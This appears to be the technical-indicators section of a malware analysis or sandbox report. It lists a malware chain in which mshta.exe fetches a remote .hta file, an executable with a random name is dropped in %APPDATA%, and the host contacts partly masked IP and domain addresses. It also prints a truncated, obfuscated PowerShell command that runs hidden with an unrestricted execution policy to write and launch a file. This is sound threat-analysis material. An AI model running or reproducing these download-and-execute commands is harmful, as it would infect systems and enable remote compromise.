Technical Information
- '<SYSTEM32>\mshta.exe' http://17#.#3.175.179/olmi/purchase.hta
- '%APPDATA%\knwbccwgyhsaesytjfvxiwlhcszgrfnqdt.exe'
- %APPDATA%\knwbccwgyhsaesytjfvxiwlhcszgrfnqdt.exe
- '17#.#3.175.179':80
- 'cu####g-tools.in':443
- http://17#.#3.175.179/olmi/purchase.hta
- http://17#.#3.175.179/olmi/Knwbccwgyhsaesytjfvxiwlhcszgrfnqdt.exe
- DNS ASK cu####g-tools.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function M($wn, $AX){[IO.File]::WriteAllBytes($wn, $AX)};function U($wn){if($wn.EndsWith((vR @(30472,30526,30534,30534))) -eq $True){Start-Process (vR @(30540,3054...' (with hidden window)